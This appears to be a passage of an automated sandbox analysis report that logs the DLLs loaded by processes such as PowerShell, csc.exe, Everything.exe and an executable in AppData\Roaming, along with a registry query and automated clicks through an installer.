                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeSection loaded: sppc.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: urlmon.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: iertutil.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: srvcli.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: netutils.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: wldp.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: propsys.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: profapi.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: windowscodecs.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: textshaping.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: dataexchange.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: d3d11.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: dcomp.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: dxgi.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: twinapi.appcore.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: textinputframework.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: coreuicomponents.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: coremessaging.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: ntmarta.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: wintypes.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: wintypes.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: wintypes.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: thumbcache.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: policymanager.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: msvcp110_win.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: apphelp.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: ehstorshell.dll
                                Source: C:\Program Files\Everything\Everything.exeSection loaded: cscui.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: Everything.lnk.7.drLNK file: ..\..\..\..\..\Program Files\Everything\Everything.exe
                                Source: Everything.lnk0.7.drLNK file: ..\..\..\Program Files\Everything\Everything.exe
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile written: C:\Users\user\AppData\Local\Temp\nss476A.tmp\InstallOptions.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeAutomated click: OK
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeAutomated click: I Agree
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeAutomated click: Next >
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeAutomated click: Next >
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeAutomated click: Install
                                Source: C:\Windows\System32\conhost.exeAutomated click: OK
                                Source: C:\Windows\System32\conhost.exeAutomated click: I Agree
                                Source: C:\Windows\System32\conhost.exeAutomated click: Next >
                                Source: C:\Windows\System32\conhost.exeAutomated click: Next >
                                Source: C:\Windows\System32\conhost.exeAutomated click: Install
                                Source: Window RecorderWindow detected: More than 3 window changes detected
